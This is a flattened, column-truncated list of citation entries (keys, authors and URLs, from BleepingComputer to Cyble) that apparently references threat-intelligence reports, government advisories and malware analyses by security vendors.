BleepingCoCimpanu, Chttps://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-preven
BleepingCoIlascu, I. https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-f
BleepingCoAbrams, L. https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-e
Booz Allen Booz Allen https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-ligh
Brining Mi Tim Wadhwa https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikat
Bromium Ur Holland, A.https://www.bromium.com/how-ursnif-evades-detection/
Bugcrowd RBugcrowd. https://www.bugcrowd.com/glossary/replay-attack/
(
BushidoTokWill Thomas https://blog.bushidotoken.net/2023/09/tracking-adversaries-akira-another.html
CERT-EE G CERT-EE. ( https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf
CERT-EU DMeintanis, http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf
CERT-FR PYCERT-FR. ( https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf
CERT-UA Wi CERT-UA. (2 https://cert.gov.ua/article/3761104
CIRCL Plug Computer Ihttp://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf
CIS EmotetCIS. (2017, https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/
CIS EmotetCIS. (2018 https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/
CISA AA20-DHS/CISA. https://us-cert.cisa.gov/ncas/alerts/aa20-239a
CISA AA20-CISA. (2020https://us-cert.cisa.gov/ncas/alerts/aa20-259a
CISA AA20-CISA. (202 https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions
CISA AA20 CISA, FBI, https://us-cert.cisa.gov/ncas/alerts/aa20-301a
CISA AA21-CISA. (2021https://us-cert.cisa.gov/ncas/alerts/aa21-200a
CISA AA24-CISA et al. https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compro
CISA AR18 CISA. (201 https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-352A
CISA AR21 CISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
CISA AppleCybersecurihttps://us-cert.cisa.gov/ncas/alerts/aa21-048a
CISA ComRCISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a
CISA EB AuCybersecurhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a
CISA GRU2US Cybersec https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and
CISA Iran CISA. (202 https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-264a
CISA MAR DHS/CISA, https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a
CISA MAR-USG. (2020https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b
CISA MAR-CISA, FBI, https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
CISA MFA PCybersecurihttps://www.cisa.gov/uscert/ncas/alerts/aa22-074a
CISA Phish CISA. (2021https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks
CISA Play CISA. (202 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a
CISA RoyalCISA. (202 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
CISA Scatt CISA. (202 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a
CISA SoreFCISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a
CISA Star CISA, et al https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a
CISA SuperCISA. (2021https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a
CISA WellMCISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c
CISA WellMCISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b
CISA ZebroCISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
CME Githubyt3bl33d3https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference
CSM Elder Clayton, M.https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-g
CYBERCOMCyber
I Natiohttps://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-ope
Cadet BlizzMicrosoft Thttps://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-di
Cado Secu Cado Securhttps://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/
Camba RA Camba, A. http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/
Carbon BlaLee, S.. ( https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi
Carbon BlaKnight, S.. https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-l
Carbon BlaLee, S.. (2 https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pre
Carbon BlaCarbon Blahttps://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.h
CarbonBlacBaskin, B. https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/
CarbonBlacCarbonBlack https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware
CarbonBla Lee, S. (2 https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomw
Carnegie MCarnegie Mhttps://www.kb.cert.org/vuls/id/843464
Cary EsentuCary, M. ( https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
Certfa Cha Certfa Labshttps://blog.certfa.com/posts/charming-kitten-christmas-gift/
Chaos Stol Sebastian Fhttp://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/
Charles McCharles McL https://www.zdnet.com/article/how-hackers-attacked-ukraines-power-grid-implications-for-industrial-io
Check PoinItkin, E. a https://research.checkpoint.com/2021/the-story-of-jian/
Check PoinCheck Pointhttps://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
Check PoinCheck Pointhttps://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-pow
Check PoinCheck Poinhttps://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/
Check PointGanani, M.https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/
Check PoinCheck Pointhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/
Check PoinCheck Poinhttps://research.checkpoint.com/2020/ransomware-alert-pay2key/
Check PointCheck Poinhttps://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf
Check PoinCheck Poinhttps://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/
Check PoinHarakhavikhttps://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/
CheckPointMarc Sali https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-org
CheckPointCheck Poinhttps://research.checkpoint.com/2020/bandook-signed-delivered/
CheckPointOfer Caspi.https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
CheckPointCheckPointhttps://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/
CheckPoin Eisenkraft, https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/
CheckPointCheck Poinhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/
CheckPointThreat Int https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-ced
CheckpointCheck Pointhttps://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/
CheckpointCheckPointhttps://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-t
CheckpointCheckpointhttps://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/
Chkrootkit Murilo, N., http://www.chkrootkit.org/
Chromium Chromium.https://www.chromium.org/hsts/
(
Chronicle Chronicle Bhttps://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a
Cider SecurDaniel Kriv https://www.cidersecurity.io/top-10-cicd-security-risks/
Cisco ARP King, J., L https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_pape
Cisco Blog Omar Santos https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/41699
Cisco CaddMalhotra, https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html
Cisco DNS Brumaghin,http://blog.talosintelligence.com/2017/03/dnsmessenger.html
Cisco GrouEsler, J., http://blogs.cisco.com/security/talos/threat-spotlight-group-72
Cisco H1N1Reynolds, Jhttp://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities
Cisco H1N1Reynolds, Jhttp://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities-part-2
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#38
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#31
Cisco IOS Cisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#40
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#34
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#30
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
Cisco IOS SCisco. (n.d https://tools.cisco.com/security/center/resources/integrity_assurance.html#39
Cisco OperVentura, V.https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/
Cisco Secu Cisco. (20 https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-s
Cisco SynfuGraham Holm https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
Cisco Talo Venere, G. https://blog.talosintelligence.com/avoslocker-new-arsenal/
Cisco Talo Raghuprasad https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html
Cisco TalosDarin Smithhttps://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/
Cisco Talo N. Baisini. https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html
Cisco Ukra Biasini, N. https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html
Cisco UmbrKasza, A. ( https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/
Citizen La Scott-Railt https://citizenlab.ca/2016/08/group5-syria/
Citizen LabMarczak, B.https://citizenlab.org/2016/05/stealth-falcon/
CitizenLab Hulcoop, A.https://citizenlab.ca/2016/11/parliament-keyboy/
CitizenLab Alexander,https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resur
Ciubotariu Ciubotariu,http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea
ClearSky C ClearSky C http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf
ClearSky K ClearSky Rehttps://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf
ClearSky L ClearSky R https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf
ClearSky L ClearSky C https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf
ClearSky MClearSky. ( https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98M
ClearSky ClearSky C https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-
ClearSky OiClearSky Cyhttp://www.clearskysec.com/oilrig/
ClearSky P ClearSky. https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf
ClearSky S ClearSky Cyhttps://www.clearskysec.com/siamesekitten/
ClearSky WiClearSky Cyhttp://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf
ClearSky a ClearSky anhttps://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf
ClearkSky ClearSky. https://www.clearskysec.com/fox-kitten/
CloudSploiCloudSploi https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
Cobalt Str Mudge, R. https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement
Cobalt Str Strategic C https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.
Cobalt Str Cobalt Stri https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf
CobaltStri Mudge, R. (https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/
CobaltStrikStrategic C https://www.cobaltstrike.com/help-scripted-web-delivery
Cofense AgJames Arndt https://cofense.com/blog/the-rise-of-agent-tesla-understanding-the-notorious-keylogger/
Cofense AsDoaty, J., https://web.archive.org/web/20200302071436/https://cofense.com/seeing-resurgence-demonic-astaro
Cofense N Patel, K. https://web.archive.org/web/20240522112705/https://cofense.com/blog/nanocore-rat-resurfaced-sew
Cofense R Gannon, M.https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/
CoinTicker Thomas Reed https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdo
ComparitecJustin Schahttps://www.comparitech.com/blog/information-security/what-is-a-replay-attack/
ComputerWe Warwick Ash https://www.computerweekly.com/news/450302128/Strider-cyber-attack-group-deploying-malware-fo
Content truMicrosoft. https://docs.microsoft.com/en-us/azure/container-registry/container-registry-content-trust
Content truDocker. (20https://docs.docker.com/engine/security/trust/content_trust/
CopyKittenMinerva Lahttps://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf
Core SecurCore Securihttps://www.coresecurity.com/core-labs/open-source-tools/impacket
Corio 2008Corio, C., https://learn.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)
Costa AvosCosta, F. ( https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=arti
CrowdStri Wiley, B. https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-expl
CrowdStrikRed Team Lhttps://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
CrowdStrikLoui, E. a https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
CrowdStrikRYANJ. (20http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
CrowdStrikJohn, E. a https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/
CrowdStrikCrowdStrikhttps://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-info
CrowdStrikOrleans, A https://www.crowdstrike.com/blog/who-is-pioneer-kitten/
CrowdStrikCrowdstrike http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf
CrowdStrikHanel, A. https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomwar
CrowdStrikCrowdStrike https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
CrowdStrikCrowdStrike https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-
CrowdStrikeCrowdStrike https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
CrowdStrikPodlosky, Ahttps://www.crowdstrike.com/blog/wizard-spider-adversary-update/
Crowdstrik Vaishnav https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
CrowdstrikAlperovitchhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
CrowdstrikThomas, W.https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-uk
CrowdstrikCrowdstrikhttps://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
CrowdstrikCrowdStrikhttps://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
CrowdstrikMeyers, A. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitt
CrowdstrikCrowdStrikhttps://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf
CrowdstrikFrankoff, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-f
Crowdstri Meyers, A. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-pand
CrowdstrikCS. (2020, https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/
Crowdstri Parisi, T. https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-compan
CrowdstrikCrowdstrike https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware
Crysys Sky sKyWIper An https://www.crysys.hu/publications/files/skywiper.pdf
Cyber ForenSkulkin, O. https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-foren
Cyber SafeCISA. (2023https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf
CyberArk LNaim, D.. https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise
CyberBit DHod Gavrielhttps://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/
CyberBit EaGavriel, H. https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
CyberESI GCyberESI. https://web.archive.org/web/20141226203328/http://www.cyberengineeringservices.com/2011/12/15
CyberScoopWaterman,https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/
S
CybereasonSalem, E. https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
CybereasonCybereasonhttps://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles
Cybereaso Cybereasonhttps://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterpris
CybereasonSalem, E. https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-rese
CybereasonCybereasonhttps://www.cybereason.com/blog/cybereason-vs.-clop-ransomware
CybereasonDahan, A. (https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20
CybereasonRochbergerhttps://www.cybereason.com/blog/cybereason-vs.-conti-ransomware
CybereasonSternfeld, http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real
CybereasonRochbergerhttps://www.cybereason.com/blog/cybereason-vs-egregor-ransomware
Cybereaso Cybereasonhttps://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-inc-ransomware.pdf
Cybereaso Dahan, A. ehttps://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
CybereasonCybereasonhttps://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsen
CybereasonDahan, A. https://www.cybereason.com/blog/operation-cobalt-kitty-apt
Cybereaso Cybereasonhttps://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques
CybereasonCybereasonhttps://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powe
CybereasonCybereasonhttps://www.cybereason.com/blog/royal-ransomware-analysis
CybereasonCybereasonhttps://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunicati
CybereasonCybereasonhttps://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to
CybereasonSalem, E. ( https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-
CybereasonSalem, E. https://www.cybereason.com/blog/valak-more-than-meets-the-eye
CybereasonCybereasonhttps://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper
Cyberint QCyberint. https://blog.cyberint.com/qakbot-banking-trojan
Cyberreas Dahan, A. https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-a
CybersecurNSA, CISA, https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMP
CybersecurNCSC, CISA,https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf
Cyble Blac Cyble. (202https://blog.cyble.com/2022/05/06/black-basta-ransomware/
Cyble Egre Cybleinc. ( https://cybleinc.com/2020/10/31/egregor-ransomware-a-deep-dive-into-its-activities-and-techniques/
